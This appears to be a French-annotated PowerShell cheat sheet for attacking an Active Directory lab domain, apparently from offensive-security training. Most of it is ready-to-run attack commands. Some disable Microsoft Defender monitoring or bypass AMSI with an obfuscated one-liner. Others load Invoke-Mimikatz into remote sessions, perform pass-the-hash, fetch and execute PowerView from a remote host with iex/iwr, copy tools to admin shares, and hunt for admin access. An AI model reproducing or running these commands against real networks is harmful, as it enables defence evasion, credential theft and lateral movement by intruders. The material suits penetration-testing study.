Import-Module ..\\Microsoft.ActiveDirectory.Management.dll 
Import-Module .\\ActiveDirectory.psd1

$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
Enter-PSSession -Session $sess

Invoke-command -ScriptBlock {whoami} -ComputerName (Get-Content <list_of_servers>) # Injection de la commande "whoami" dans une list de machines
Invoke-command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-command -Filepath C:\\AD\\Tools\\Invoke-Mimikatz.ps1 -Session $sess # Load d'une fonction directement dans la mémoire de la machine ciblée
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess # Appel d'une fonction en la loadant directement dans la mémoire

Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USERNAME> /domain:<DOMAIN> /ntlm:<HASH> /run:powershell.exe"'

$ExecutionContext.SessionState.LanguageMode #Si c'est ConstrainedLanguage il nous sera impossible d'executer des modules 

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

sET-ItEM ( 'V'+'aR' +  'IA' + 'blE:1q2'  + 'uZx'  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    GeT-VariaBle  ( "1Q2U"  +"zX"  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System'  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f'amsi','d','InitFaile'  ),(  "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true

powershell -ep bypass

iex (iwr <http://172.16.100.X/PowerView.ps1> -UseBasicParsing) #via un HFS
Copy-Item .\\Invoke-MimikatzEx.ps1 \\\\dcorp-adminsrv.dollarcorp.moneycorp.local\\c$\\"Program Files" # Utiliser le SMB Protocole 

Find-LocalAdminAccess

Invoke-UserHunter -CheckAccess #par default groupe domain admin
Invoke-UserHunter -GroupName "RDPUser" -CheckAccess